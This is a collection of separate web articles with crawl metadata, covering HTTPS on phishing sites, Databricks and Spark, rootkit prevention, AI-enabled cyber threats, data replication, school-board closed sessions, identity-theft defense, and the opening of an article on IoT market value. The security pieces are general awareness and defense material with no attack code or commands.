Be careful where you click. When you're browsing the Internet these days, you may realize the majority of sites you visit have a green padlock in the left part of the address bar, meant to indicate it's HTTPS status. That HTTPS status, which indicates the website is encrypted, is important for people looking to stay secure as they swim the often murky waters of the Internet. But what happens when that symbol of security is increasingly fake? Phishing research and defense firm PhishLabs has published research indicating that hackers and criminals are becoming more likely to adopt HTTPS. About 24% of the sites that a phishing email is trying to get you to click are encrypted. "That's up from less than three percent at this time last year, and less than one percent two years ago." wrote Phishlabs. Why the increase? Websites overall are increasingly being encrypted, thanks to initiatives from Let's Encrypt and Google, so it would make sense that sites meant to steal user information would also jump on the encyrption bandwagon. The rate of HTTPS adoption on phishing sites is rising much faster than over HTTPS adoption, however. Instead, the HTTPS is being used to make the site seem more legitimate in order to lure victims. "The attackers are making that choice even though this is not needed to complete the crime," Crane Hassold, a threat intelligence manager at PhishLabs, told Wired. The number of phishing sites with HTTPS is only likely to grow. So the next time you get an email that gives you pause, don't be fooled an encrypted site. Instead, follow these tips to help you avoid taking the bait.
<urn:uuid:78f51544-6262-438d-b971-9d44d4886014>
CC-MAIN-2024-38
https://www.nextgov.com/cybersecurity/2017/12/new-phishing-scheme-could-fool-you-false-sense-security/144418/
2024-09-13T08:22:11Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651510.65/warc/CC-MAIN-20240913070112-20240913100112-00843.warc.gz
en
0.968881
342
2.75
3
Big data frameworks and the accessibility of cloud computing has democratized data science. Data processing frameworks have evolved such that exceedingly large data sources can be consumed, processed, and modeled. Coupled with cloud-based solutions, the processing times now afford the data scientist to focus on core data science problem solving rather than wrangling systems, platforms, and engineering concerns. At the core of the modern data science tech stack is distributed computing. This refers to the use of a network of machines that act as a single machine, to complete a task. These distributed systems typically utilize a driver/worker architecture where one machine in the system is the driver and acts as a coordinator for the worker machines that execute tasks and report back to the driver. Distributed solutions provide an astounding amount of power but an equal amount of complexity, which can distract the data scientist. As distributed computing evolved, developments in data processing methodologies emerged to capitalize on the processing advances of the distributed capacity. One such processing framework is MapReduce: designed for processing large amounts of data in parallel in a reliable and fault-tolerant manner. MapReduce works in two main phases: The Map phase where input data is split into pairs and mapped, and the Reduce phase where data is shuffled and then reduced. While MapReduce was a huge step forward for distributed computing it still has its disadvantages: 1) limited to batch processing 2) IO bound to disk which results in undesirable compute times 3) designed to work specifically with Hadoop which limited its use cases The shortcomings of MapReduce spurred advancements which matured into Apache Spark, an open-source unified computing engine that is up to 100x times faster than Hadoop MapReduce . On top of this core processing engine, Spark has libraries for SQL, graph computation, stream processing and machine learning which have contributed to Spark becoming one of the most popular tools for Big Data. Spark also provides support for a multitude of languages such as Python, R, Java, Scala and SQL. While the speed increase provided by Spark was a game changer on its own, a major key to the success of Spark is the “unified” component. Unlike MapReduce which was designed to work with one specific kind of storage, Spark is designed to support a wide variety of persistent storage systems such as cloud storage systems like Azure or Amazon S3, distributed file systems, key-value stores, or message buses. Prior to Spark people were forced to use a combination of different systems, libraries and API’s in order to complete big data tasks. But with Spark’s host of libraries and API’s it can be addressed over the same computing engine with a consistent set of API’s and efficient project codebases. While Spark made tremendous strides in improving ease of use, the configuration, deployment, and management of compute clusters is still shrouded in a layer of complexity that scales up as the clusters do. The use of cloud resources is optimal for distributed computing solutions due to the overhead and infrastructure required to utilize distributed computing. Using cloud solutions over on-premise hardware allows for much greater flexibility and scalability. Cloud solutions allow businesses to be agile and react quickly to changes without involving the commitments that accompany traditional on-premise hardware. Cloud solutions can be scaled up or down at a moment’s notice whereas making changes to infrastructure involving physical equipment is more complicated and time-consuming. Physical equipment also requires maintenance and upgrades both of which can be eliminated with cloud computing as these burdens fall to the cloud provider. Cloud solutions position businesses to leverage distributed computing. Putting it all together, Databricks has been introduced to provide a truly unified analytics platform which drives machine learning development through the deployment function. Built on Apache Spark and embedding the cluster management tools, with Databricks, one can: - Configure, deploy, and manage clusters without having to invest in IT infrastructure - Connect to a variety of node types including CPU and GPU enabled nodes of various sizes/configurations - Utilize a managed environment including a managed version of MLflow, one of the fastest growing ML lifecycle management tools - Build/Deploy on MS Azure or Amazon Web Services - Integrate with other resources. Databricks allows you to create mount points on the Databricks File System (DBFS) that allow you to access data easily from blob storage, a Data Lake, or even an Amazon S3 bucket. - Integrate with Azure Data Factory, allowing businesses to leverage their existing Databricks service for things such as ETL in their data pipelines. - Facilitate version control with a revision history built into Databricks notebooks and along with support to easily link to an existing Git repository hosted on GitHub, Bitbucket, or Azure Repos. As all aspects of the data analytics space continues to evolve at a tremendous pace, clearly the shortcomings of data processing and distributed computing presented as pain points for the data science workflow. Databricks and its suite of functionality has proven to remove a great deal of distraction from our projects. At DecisivEdge, we have developed a robust and scalable machine learning development platform based on Databricks that allows the data scientist to focus on data science. As a result, we are delivering projects faster and providing clients with higher quality deliverables.
<urn:uuid:0ed16e2b-fdc4-4521-a7fd-d1ae58f8cc1c>
CC-MAIN-2024-38
https://www.decisivedge.com/blog/machine-learning/
2024-09-17T02:21:20Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651722.42/warc/CC-MAIN-20240917004428-20240917034428-00543.warc.gz
en
0.934805
1,088
3.171875
3
Rootkits – When Bad Turns to Ugly Few words strike more fear into the heart of IT administrators than rootkit. Once a rootkit has been discovered, it’s usually a strong indicator that one or more systems on a network have been compromised and that any data being stored on those systems is now suspect or even worse, has been captured by the rootkit attacker to be released “into the wild” of the Internet using Pastebin or similar online anonymous data posting sites. But before you become too alarmed, let’s delve a little deeper into what a rootkit is, how systems become infected with rootkits, and what you can do to prevent the rootkit infection. What Is A Rootkit? According to Tech Target the term rootkit is: “A rootkit is a program or, more often, a collection of software tools that gives a threat actor remote access to and control over a computer or other system. While there have been legitimate uses for this type of software, such as to provide remote end-user support, most rootkits open a backdoor on victim systems to introduce malicious software, such as viruses, ransomware, keylogger programs or other types of malware, or to use the system for further network security attacks. Rootkits often attempt to prevent detection of malicious software by endpoint antivirus software.” As you can see by the description provided above, the term rootkit can mean a number of things. A rootkit can enable an attacker to do numerous malicious things such as log keystrokes to capture passwords and other sensitive file information, all the way to giving the attacker full control over a system. Rootkits can install other malicious programs to your operating system that do other things such as disable anti-virus/anti-malware programs, take screenshots of the computer screen while the user has certain programs, and even allow the attacker to infect other system processes that the compromised operating system has privileged access to and “pivot” off of that host to attack other uninfected systems. Types of Rootkits Rootkits can contain a wide range of tools that allow a hacker to steal your passwords making it easy for them to steal your credit card and bank account information. Rootkits can range from low level firmware attacks through high privileged operations. Rootkits also give hackers the ability to disable security software to track the keys that are tapped on your computer. Because rootkits hijack security software, they are hard to detect. This makes a rootkit more likely to live on your computer for a long period of time, causing long term computer damage. There are five common types of rootkits: Hardware or Firmware Rootkits This malware type can infect your computer’s hard drive or its system BIOS. It can also infect your router and intercept data written on your driver's disk. This attack replaces the bootloader on your operating system with a hacked version. The rootkit can be activated even before your operating system is running. This malware has access to a computer via its Random Access Memory (RAM). Fortunately these rootkits only live in your computer’s RAM until you reboot your system. User Mode Rootkits These rootkits can infect computer programs such as Word, Paint, Notepad, and more. Every time these programs are run, hackers will gain privileged access to a computer. These programs will still run normally, making it difficult to detect. Users may find it tough to perform rootkit detection. Kernel Mode Rootkits The computer’s operating system is the target of a kernel mode rootkit. Kernel mode rootkits can change how operating systems function, giving them low-level access to initiate computer commands. This makes it easy for hackers to steal data and personal information. How Do Systems Become Infected with Rootkits? It can be difficult to detect and remove rootkits. There is not a wide variety of commercially available products that can completely find and remove rootkits on a system. However, there are various ways users can look for a rootkit on an infected machine. These include: - Behavioral-based methods: Use behavior-based methods to search for strange behavior that could lead to a rootkit on your computer such as slow operating speeds, odd network traffic, or other strange behavior patterns not normal for your machine. - Memory dump analysis: This is an effective way to detect rookits that are hiding in a systems memory. By analyzing the data from the memory dump, you should be able to locate it. - Signature scanning: Rootkit scans will look for signatures left by hackers and will identify if there is any foul play on the network. They should be run on a seperate, clean computer when an infected one is powered off. Computer systems can become infected with rootkits in a variety of ways. One of the most common ways that systems become infected with a rootkit is by visiting a malicious website that exploits another vulnerability resident on the user’s computer system and installs the rootkit. It can also happen if the user attaches an infected USB thumb-drive or other media container to the system that exploits a known, or unknown, vulnerability and infects the system with the rootkit. Viruses and other malware play a part in the rootkit scenario as well. Many rootkits carry commands to download the rootkit from a remote source and install it using the user’s technology. From Humble Beginnings Comes a Nightmare In years long since past, before there was commercial software such as Microsoft Remote Desktop or even WEBEX, computer scientists created their own rootkits as a means of controlling remote systems and being able to work on items that they may not have been able to work on locally. Fast forward to just a few years ago and you’ll find that rootkits were adopted by people in the hacking underground for more nefarious actions. Once rootkits were weaponized the game was over. Unpatched computers around the globe became targets for rootkits overnight and thus the use of rootkits for nefarious use was born. Can I Stop a Rootkit From Infecting Me? Steps You Can Take From Protecting Against Rootkits. Yes, you can! There are basic steps that every user can learn to protect themselves from becoming infected with a rootkit. Here are some rootkit detection and prevention examples. Keep your system patched against vulnerabilities and threats. Pay close to advisories from software and hardware manufacturers and apply what they release to address issues as soon as possible. This helps ensure that the rootkit attacker won’t have an easy way to infect your device (s) and helps safeguard you. Remember though, keeping your system up-to-date includes not only the operating systems that you use but the web browser, office automation software (word processing, spreadsheet, presentation) and other applications that may have patches available for them to protect you from rootkit infection. Keep your anti-virus and anti-malware software up-to-date. This is one of the most crucial things you can do to ensure that you do not become installed with a rootkit. If your anti-virus and anti-malware software is not up to date there is a chance that you’ll become infected with a rootkit that could possibly even disable your protection mechanisms and take your computer over for nefarious use. Be mindful of the websites that you view. Many “bad” sites are set up to look for weaknesses in the user’s web browser and use that as an entryway to infect them. Thankfully, many of the modern browsers have the resources to(Microsoft Edge, Google Chrome, and Mozilla Firefox) to alert users when they travel to a site that is known to be bad. They do this by taking advantage of crowd-sourcing information about websites that may be potentially hazardous for users to visit and then making the information available to all users of the browser by putting up an alert page that warns the user that the site is known to be bad and that if they visit it they are doing so at their own risk. On the application development side, make sure that your applications are tested for security issues before they go into a production setting. Primarily you want to be looking for SQL injection and buffer overflow issues. To perform rootkit detection, you can use either penetration testing or automated code reviews (or both) to detect and remove issues before the application goes into production settings. These types of vulnerabilities could allow an attacker to compromise the system and have administrator or “root” privileges that would allow them to install a rootkit on the system and make it a system that could potentially infect the computers of users who utilize the application for business or personal use. Be cautious of the software that you download and install on your computer. Over time there have been many software packages that have been compromised and had a rootkit added to them so when you install the backdoored software you’re also installing the rootkit along with it. Always download from known good applications stores such as the Apple App Store and Google Play or from reputable sources that the Internet community as a whole feels confident in. While this is still not 100% protection, it goes a long way to helping ensure that your system does not become infected with a rootkit from compromised apps or other types of software. If you can, always try to check the MD5 or SHA256 sum to make sure what you download has the same hashed value as what the creator has on their website. If it doesn’t have the same value DON’T INSTALL IT! It has potentially been tampered with. Even better, look for a PGP/GPG signature for the application on the creator’s website to see if you can validate the signing key used when the application was published. What Can I Do If I Become Infected with a Rootkit? So, say you’ve taken all of the precautions outlined in the article and you still become infected with a rootkit, what can you do? First off, all is not lost. Many times, there are “clean up” tools made by anti-virus and anti-malware vendors that you can use to remove your system of the rootkit and its associated tool sets. However, with that being said, there is always a chance that the “clean up” tool will not catch all rootkits. Why? Because just like viruses and other types of malware, rootkits are always evolving so that they can circumvent the protection measures that users put in place on their computers. So, what do you do at this point? If you want to be absolutely sure that your system is “clean” at that the rootkit has been removed then you will more than likely need to “scratch” the computer and wipe the drive of all of its contents. At this point you’ll need to reinstall the operating system and all of the applications that used to reside on the platform. Oh, and the file that you had on the system, consider them suspect as well as some attackers will use rootkits to install other types of malware into the files such as word documents, spreadsheets and even presentations. So remember, if you re-import those files back on to your computer, you may inadvertently re-infect the system and then you’re back to square one. If all else fails, call in a professional that deals with rootkits and similar issues so that they can guide you the recovery process. Will it cost money? Yes. However, you’re also buying yourself piece of mind so that you know that when you use your computer, or if you’re in a business setting, one of your users does, at least you know that the system is safe to use and won’t start the infection process all over again. While rootkits can be difficult to detect and inflict damage to personal and commercial computers, it doesn’t have to be the end of the world. There are ways to manage systems to lower your risk and in the case of infection, and a myriad of ways to recover from rootkits. However, by putting some basic practices in place as outlined in this post, there are ways to reduce your risk and still use your computer without fear of compromise. About Digital Defense - Asset discovery and tracking - OS and web application risk assessment - Targeted malware threat assessment - Machine learning features that leverage threat intelligence - Agentless & agent-based scanning - Penetration testing for networks, mobile applications, and web applications - Compliance management. One of the world’s longest tenured PCI-Approved Scanning Vendors Our SaaS platform virtually eliminates false-positives associated with legacy vulnerability management solutions, while also automating the tracking of dynamic and transient assets and prioritizing results based on business criticality. About the Author Our Vulnerability Research Team consists of credentialed (Security+, Network+, CISSP) cybersecurity experts with decades of combined experience in research, analysis, and the discovery of unknown vulnerabilities. Do More to Protect Against Malicious Programming Get the guide Dissecting Ransomware: Understanding Types, Stages, and Prevention for more information about how to better protect your organization against malicious programs.
<urn:uuid:937dfe3a-8771-4c12-ab24-a7b830c704aa>
CC-MAIN-2024-38
https://www.digitaldefense.com/blog/rootkits-what-is-a-rootkit-virus-scan-digital-defense/
2024-09-18T08:05:59Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651886.88/warc/CC-MAIN-20240918064858-20240918094858-00443.warc.gz
en
0.943546
2,772
2.65625
3
AI poses a major threat to cybersecurity The human vulnerability and social engineering are the biggest target in the majority of cybercrimes and AI can assist cyber criminals by hitting the key weakness, human vulnerabilities with an AI styled attack, both the human and cybersecurity products would fail to detect it. AI technology can both enhance cybersecurity measures and pose a threat to them. On the one hand, AI can be used to detect and prevent cyber attacks, as well as analyze vast amounts of data to identify potential threats. However, on the other hand, AI can also be used by cybercriminals to carry out attacks that are more sophisticated and harder to detect. One way that scammers can leverage AI is through the use of "deepfake" technology. Deepfakes are videos or audio recordings that have been manipulated using AI to make them appear authentic, even though they are not. Scammers can use deepfakes to create fake videos or audio recordings of individuals, such as CEOs or government officials, and then use those recordings to trick people into giving them sensitive information or money. Another way that scammers can use AI is through the use of "chatbots." Chatbots are computer programs that are designed to mimic human conversation. Scammers can use chatbots to engage with people online, pretending to be a legitimate company or organization, and then use the conversation to extract sensitive information from their targets. The more serious threat is AI can also be used to automate and scale phishing attacks. By using AI algorithms to craft convincing phishing emails and messages, cyber criminals and scammers can send out a large volume of messages with a high degree of personalization, making it more likely that their targets will fall for the scam. AI can be used to carry out "credential stuffing" attacks. In a credential stuffing attack, scammers use automated bots to try out lists of usernames and passwords on different websites until they find a match. By using AI to generate these lists and automate the attack, scammers can carry out attacks on a much larger scale than would be possible manually. Overall, AI technology can be both a powerful tool for enhancing cybersecurity measures and a potent weapon in the hands of cybercriminals. As the technology continues to advance, it is likely that both the benefits and the risks will continue to grow. DIGITPOL believes that governments should take action now (March 2023) to rapidly regulate the use of AI as the threats are enormous to security if not handled. The key points to focus on: - AI can also be used to carry out Distributed Denial of Service (DDoS) attacks. By using AI to direct an army of bots to attack a specific target, scammers can overwhelm the target's servers and effectively take them offline. - AI can be used to bypass security measures such as firewalls, intrusion detection systems, and antivirus software. By training AI algorithms to identify and exploit vulnerabilities in these systems, attackers can gain unauthorized access to sensitive information. - AI can be used to automate the process of discovering and exploiting new vulnerabilities. By analyzing vast amounts of data and identifying patterns, AI can quickly discover new vulnerabilities and exploit them before they can be patched. - AI can be used to carry out advanced persistent threats (APTs), which are long-term, targeted attacks designed to gain access to sensitive information. By using AI to automate the process of reconnaissance, scammers can gather information on their targets and then use that information to launch targeted attacks. - AI can be used to create "zero-day" exploits, which are attacks that take advantage of previously unknown vulnerabilities in software or hardware. By using AI to analyze and reverse engineer software, scammers can discover these vulnerabilities and create exploits before they are discovered by the software's creators. - AI can be used to create more convincing fake websites and social media profiles, making it easier to carry out phishing attacks and other types of social engineering scams. - AI can be used to carry out "fuzzing" attacks, which involve inputting large amounts of random or invalid data into an application or system in order to trigger errors or crashes. By using AI to generate and input this data, scammers can quickly identify vulnerabilities that may be missed by traditional testing methods. - AI can be used to generate and distribute malware, including ransomware and trojans. By using AI to analyze and identify vulnerabilities in target systems, scammers can create malware that is more effective at bypassing security measures and spreading undetected. - AI can be used to carry out "living off the land" attacks, which involve using legitimate tools and software already installed on a system to carry out malicious activities. By using AI to automate these attacks, scammers can make them more efficient and difficult to detect. - AI can be used to carry out "adversarial attacks" on machine learning models used in cybersecurity. By using AI to generate malicious input data, scammers can cause these models to produce incorrect results, leading to false positives or false negatives and potentially allowing attackers to bypass security measures. - AI can be used to carry out "cyber-physical attacks," which involve manipulating physical systems such as industrial control systems or critical infrastructure. By using AI to identify vulnerabilities in these systems and create targeted attacks, scammers can cause significant damage or disruption. DIGITPOL states the number one crime that will increase with AI technology is email scams and phishing attacks will rise to a new level with AI automating a high degree of personalisation meaning victims will fall easier to such fraudulent mails, AI’s offensive capabilities are built from experience-based learning and self-learning therefore, AI can increase cybercrimes if cyber criminals can leverage the technology, we can be certain of it. Social engineering is an easy target for AI related attacks. As AI continues to advance, it is likely that we will see new and more sophisticated ways in which it can be used to pose threats to cybersecurity. It is important for cybersecurity professionals to stay up-to-date on these developments and to develop new tools and strategies to detect and prevent AI-enabled attacks. DIGITPOL states that it is vital cyber security vendors advance their detection signatures to identify AI styled attacks. Since December 2022, Digitpol is developing a machine learning AI plugin to learn and identify specific patterns and signatures associated with criminal use of code, such as malware or botnets, and flag them for investigation. Digitpol states that machine learning algorithms can be trained to recognise patterns and behaviours associated with malicious code, and this can help detect and prevent cyber attacks by using AI to flag suspicious code, human analysts can then investigate and take appropriate actions to mitigate the threat. The AI market is a rapidly growing industry, with an estimated value of $62.35 billion in 2021 and projected to reach $733.7 billion by 2027, according to a report by MarketsandMarkets. This growth is driven by increasing demand for AI technologies in various industries such as healthcare, finance, and retail, as well as the development of new AI applications and the integration of AI into existing systems.
<urn:uuid:04c456cb-212d-4a32-8b6f-64fb97af2d2c>
CC-MAIN-2024-38
https://digitpol.com/ai-poses-major-threats-to-cybersecurity-and-how-scammers-can-leverage-the-technology/
2024-09-08T17:05:14Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651013.49/warc/CC-MAIN-20240908150334-20240908180334-00507.warc.gz
en
0.942008
1,451
3.5
4
Data Management Glossary What is replication? Replication, or data replication, is the process of creating and maintaining one or more copies of data, files, or information in multiple locations or systems in order to increase data availability, reliability, and performance. The purpose of replication is to ensure that data is always available, even if one of the copies becomes unavailable due to hardware failure, network issues, or other disruptions. Replication can be done in different ways, depending on the specific requirements of the data and the systems involved. For example, replication can be done in real-time or near real-time, and the copies can be stored locally or remotely. Replication can also be done synchronously or asynchronously, with synchronous replication ensuring that all copies are identical at all times, and asynchronous replication allowing some lag time between updates to the different copies. Replication is used in various systems and technologies, including databases, file systems, cloud storage services, and content delivery networks (CDNs). It is often an essential part of high-availability and disaster recovery (DR) strategies, as it can help ensure that data is always accessible even in the face of unexpected events. Cloud replication is the process of replicating data or services from a primary cloud environment to one or more secondary cloud environments typically to improve the availability, reliability, and durability of data and services in the cloud, and to provide DR capabilities. In a cloud replication scenario, data is automatically copied and synchronized between different cloud regions, data centers, or cloud providers, depending on the specific requirements of the system and the data. Cloud replication can be done in real-time or near real-time, and the copies can be stored locally or remotely. Some cloud providers offer automatic replication features, which enable customers to easily configure and manage replication of their data and services across multiple regions or providers. Cloud replication can also be used to ensure compliance with data sovereignty and privacy regulations, as it allows data to be stored in multiple locations, each subject to different laws and regulations. It can also improve performance by enabling users to access data and services from the nearest available location. Overall, cloud replication is an important part of any cloud-based disaster recovery and business continuity plan. It can help organizations minimize the impact of unexpected events, such as natural disasters or cyber attacks, and ensure that critical data and services are always available to users. Watch the webinar: Komprise for cloud-to-cloud replication use cases.
<urn:uuid:07402f5e-710a-412e-b085-9286482ab456>
CC-MAIN-2024-38
https://www.komprise.com/glossary_terms/replication/
2024-09-15T22:24:07Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651668.26/warc/CC-MAIN-20240915220324-20240916010324-00807.warc.gz
en
0.925166
505
3.9375
4
Issues associated with executive session board meetings Executive session board meetings often bring about thoughts of secrecy and back room deals. When a public school board requires an executive session board meeting, the chair of the school board should take time to evaluate and validate the needs of the closed session. Public school boards work hard to establish trust with the local community and executive session board meetings can threaten that trust and transparency. It is imperative that the public school board utilizes executive session board meetings effectively, efficiently, and ethically. There are several issues associated with executive session board meetings. It is imperative that the public school board evaluate the need and details related to the executive session board meeting to avoid any problems or concerns that could dissolve trust or break policy or laws. Using Executive Session Board Meetings Unethically Some school boards will call an executive session board meeting for 'personnel reasons' if they feel like their agenda for an open meeting is threatened. Once hidden from public view, decisions are made that should include public input or be made at an open meeting. Using executive session board meetings in this way undermines the purpose of the public board meetings. Stating that an executive session board meeting will be used to discuss a valid issue, but then switch to an issue that should be discussed in an open meeting is unethical and can cultivate a culture that lacks integrity and promotes concealment and secrecy. When public school board members get into the habit of using executive session board meetings in unethical ways, it is imperative that the school board chair revisit important training materials regarding open meeting laws, closed meetings, and open meetings with board members. Open Meeting Laws and Executive Session Board Meetings Every state has reasons that an executive session board meeting may be called, some states greatly differ from others in these reasons. Purposes for executive session board meetings may include specific personnel issues, setting strategies for bargaining or litigation, and budget cuts and exemptions. For these reasons, it is imperative that school board members are knowledgeable regarding their state's open meeting laws. For example, Texas' Open Meetings Act permits executive session board meetings when a board may be meeting with their attorney regarding litigation or a settlement offer, for deliberating personnel matters, discussing the purchase or lease of property, discussing certain financial contract negotiations, or discussing the deployment of security devices. School boards may include the rationale for the executive session board meeting on the meeting agenda. The chapter and section of the state's open meeting law related to your board's meeting topic should be included in the agenda. Maintaining this information can be helpful in validating the purpose of the executive session board meeting should your board face litigation. State open meeting laws outline what the school board will need to know regarding holding an executive session board meeting, so it is imperative that school board members are abreast of these regulations. Utilizing the right board management software, materials regarding the state's open meeting laws can be shared within the portal for continuous reference. BoardDocs allows board members to create training events (for instance, a training covering open meeting laws) and share and access materials related to these trainings. Documents related to policies, laws, and regulations can also be accessed in the 'Library' feature, where these materials are also searchable by keyword. Executive Session Board Meeting Agendas and Materials While there may not be an agenda for a closed meeting if it has been called during an open meeting, there should always be an agenda for pre-announced closed meetings. Executive session board meeting agendas should be detailed. Every possible topic that may need to be discussed at the closed meeting should be included in the executive session board meeting agenda. If the topic is not listed, it should not be discussed. If the discussion surrounding one topic leads to another, the meeting cannot turn to talk about the new topic if it has not been included in the executive session board meeting agenda. Deciding the amount of detail for the executive session board meeting agenda is difficult. The agenda must be enough to validate the closed session meeting but not detailed enough to compromise the confidentiality that makes the meeting necessary. Public school boards must be intentional in how they handle and prepare materials regarding executive session board meetings. While any materials distributed or shared during the executive session board meeting should remain confidential beyond the closed meeting, these documents can be searched and used during litigation. Leveraging an online board management software, board members are able to share and access materials and closed meeting agendas that are only available to users with specific roles, like board members and/or administrators. BoardDocs allows for customized privacy settings for agendas and related documents, so only users with approved roles may have access. An “Event” for the executive session board meeting can be created, with the agenda linked to the event. BoardDocs enables documents and related meeting materials to then be linked to agendas. The interlinking of meeting related information can greatly simplify the process. Confidentiality of Executive Session Board Meetings All board members should be completely aware that executive session board meetings are confidential. If anyone is not in attendance that needs to be briefed, the chair of the board may handle that responsibility. To keep the public school board informed of agenda topics, documents containing confidential information are vital and helpful. For meetings that are paper-based, these materials should be distributed at the beginning of the executive session board meeting and then collected at the close of the meeting. However, school boards can greatly diminish the risk of sensitive information being released by simply making the documents available on a board portal only accessible to authorized users. BoardDocs, a Diligent brand, can be leveraged in reducing the risk of sensitive information being released beyond the closed meeting. All materials can be uploaded into the portal and only be accessed by board members or other approved users. Board information is highly secured with 256-bit encryption, the strongest level of cybersecurity currently available. This level of cybersecurity helps mitigate risks associated with sensitive data. There are several issues associated with executive session board meetings; however, these risks can be mitigated by being aware and utilizing resources that are designed to help reduce the possibility of any of these issues occurring. When utilizing closed meetings the correct way, boards can still promote trust and transparency with the local community while working toward goals of student and district achievement. Leveraging the right tools, like BoardDocs' online board management software, school boards can effectively, efficiently, and ethically conduct executive session board meetings.
<urn:uuid:816faee1-9ed7-488a-bcfe-0b772574848d>
CC-MAIN-2024-38
https://www.diligent.com/resources/blog/issues-associated-executive-session-board-meetings
2024-09-19T18:31:12Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700652055.62/warc/CC-MAIN-20240919162032-20240919192032-00507.warc.gz
en
0.950608
1,314
2.59375
3
ID Theft Defense Identity theft occurs when someone steals your personal information and uses it to make money, open new accounts, file tax returns, make medical claims, and much more without your authorization. Identity theft affects 1 in 20 Americans, but only around 0.14% of identity theft criminals are arrested. Fortunately, there are many ways you can protect yourself from identity theft. Signs of Identity Theft: - Unauthorized Payments: When you receive your bank statement, check each transaction. Any transactions you see that you are unfamiliar with may indicate that someone else uses your identity and information. Contact your bank to protect your financial assets. - Credit Cards and Loans: Check to see if any credit accounts have been opened and if you received any loans that you did not apply for. You may not be aware of it, so check your credit history often to ensure there is no unusual activity. - Inaccurate Documentation: If you see that the information on official documents is inaccurate, this could be a sign that someone else is using your information. Check documents like your credit reports or medical documentation. - Removed Access: If you cannot access official information, there could be a chance that the hacker accessed your account and changed the information on there. They could have changed the username and password so that you can no longer access it. These accounts could include your credit reports, bank accounts, and more. - Verify Identity: If you cannot verify identity for government documents, such as applying for a password or driver’s license, this could be a sign that your identity has been stolen. Types of ID Theft: - Financial identity theft: This is the most common type of identity theft, where a thief steals your financial information, such as your credit card number, bank account details, or Social Security number, and uses it to make unauthorized purchases or withdraw money from your accounts. - Criminal identity theft: In this type of identity theft, a thief uses your personal information, such as your name, date of birth, or Social Security number, to commit crimes. The thief may use your identity to avoid arrest, obtain employment, or receive medical care. - Medical identity theft: Medical identity theft occurs when someone uses your personal information to obtain medical services, prescription drugs, or insurance coverage. This type of identity theft can also result in false entries being added to your medical records, compromising your health care. - Synthetic identity theft: Synthetic identity theft is a form of identity theft where the thief creates a new identity using a combination of real and fake information. A thief might use an actual Social Security number with a phony name and address to apply for credit. - Child identity theft: Child identity theft occurs when a thief uses a child’s personal information to open bank accounts, apply for credit, or commit other forms of identity theft. Children’s identities are particularly valuable to thieves because they often go undetected for years, allowing the thief to use the stolen identity for an extended period. - Tax identity theft: In this type of identity theft, a thief uses your Social Security number to file a false tax return and claim a refund. Tax identity theft can result in delayed tax refunds, additional taxes owed, and other financial difficulties. What To Do If Your Identity is Stolen? If you know that your identity has been stolen, there are many steps you can take to protect yourself. - Report it online on IdentityTheft.gov - Report it to a local police station - Report to the social security administration - File a report with identity theft insurance so that they may replace the costs that you may have lost when a cybercriminal stole your identity. - Freeze your credit so the criminal can no longer use your information and money for personal gain. How to Prevent ID Theft: - Secure your personal information with Agency. Agency provides ID Theft Coverage and 24/7 Security Monitoring to monitor your personal information and watch out for suspicious activity. - Review your billing cycles and card statements regularly. Even if there is a small and unrecognizable transaction, it can still be a sign that your information has been stolen. If you check it regularly, you will be able to notice identity theft sooner. - Keep your credit reports frozen until you open a new credit card account or apply for a loan. This way, the identity thief cannot create new accounts or apply for unauthorized loans. - People use password managers to implement different passwords for every login. Try using a different password for every login. While it may be challenging to remember many passwords, it can keep a hacker or scammer from accessing your information on multiple platforms. - Installing a firewall and virus-detection software is recommended so your data cannot easily be extracted from your personal device. Consider purchasing cybersecurity software from Agency. They offer 24/7 real-time monitoring and response, VPNs, Next-Gen Antivirus/EDR, ID Theft Coverage, and more. Protect your online threats with the best cybersecurity tool.
<urn:uuid:a48dbef6-69e6-47f8-83f4-fb4259f5b999>
CC-MAIN-2024-38
https://blog.getagency.com/personal-cybersecurity/what-is-id-theft-defense/
2024-09-08T19:09:40Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651017.43/warc/CC-MAIN-20240908181815-20240908211815-00607.warc.gz
en
0.921727
1,027
2.703125
3
10 Raspberry Pi Projects For Learning IoT 10 Raspberry Pi Projects For Learning IoT (Click image for larger view and slideshow.) While there's been a lot of argument over how the Internet of Things will work -- issues ranging from data privacy, to security, to the eventual role of artificial intelligence in our daily lives -- the real economic impact of these technologies remains somewhat elusive. However, a new report from McKinsey & Company's Global Institute is trying to put a real dollar amount to the global IoT market. In the report's estimation, IoT has the potential to be worth between $3.9 and $11.1 trillion by 2025. On the top end, that means IoT has the potential to represent just about 11% of the world's economy. The McKinsey study: "The Internet of Things: Mapping the Value beyond the Hype," is a market-focused report, rather than a strictly technical one. Although the IoT concept is so muddied right now, there are several valuable insights in it. First, the report -- released June 29 -- tries to define what IoT really means, a task that many other have tried, but no one has really agreed to. The authors define overall IoT as digitizing the physical world, which seems reasonable. They also exclude systems in which all of the sensors' primary purpose is to receive intentional human input, such as smartphone apps, where data input comes primarily through a touchscreen or other networked computer software where the sensors consist of the standard keyboard and mouse. As the report states: "Our central finding is that the hype may actually understate the full potential of the Internet of Things -- but that capturing the maximum benefits will require an understanding of where real value can be created and successfully addressing a set of systems issues, including interoperability." So, they profess that IoT shows lots of potential but needs to be engineered to show any true value. The report also uses a different formula rather than the usual methodology. It uses bottom-up economic modeling to estimate the economic impact of IoT by the potential benefits it can generate. This includes productivity improvements, time savings, and improved asset utilization, as well as an approximate economic value for reduced disease, accidents, and deaths. The authors admit the estimates of potential value are not equivalent to industry revenue or GDP, because they include value captured by customers and consumers. The report concludes with nine different scenarios, along with estimated segment valuations: Vehicles: Autonomous vehicles and condition-based maintenance, with an estimated value of $210 to $740 billion Cities: Public health and transportation: $930 billion to $1.7 trillion Outside: Logistics and navigation: $560 billion to $850 billion Human: Health and fitness: $170 billion to $1.6 trillion Worksites: Operations optimization, as well as health and safety: $160 billion to $930 billion Retail environments: Automated checkout: $410 billion to $1.2 trillion Factories: Operations and equipment optimization: $1.2 billion to $3.7 trillion Offices: Security and energy: $70 billion to $150 billion Home: Chore automation and security: $200 billion to $350 billion The question then is: What does the IoT market mean for IT and for the CIOs who will have to plan corporate strategies around technology that 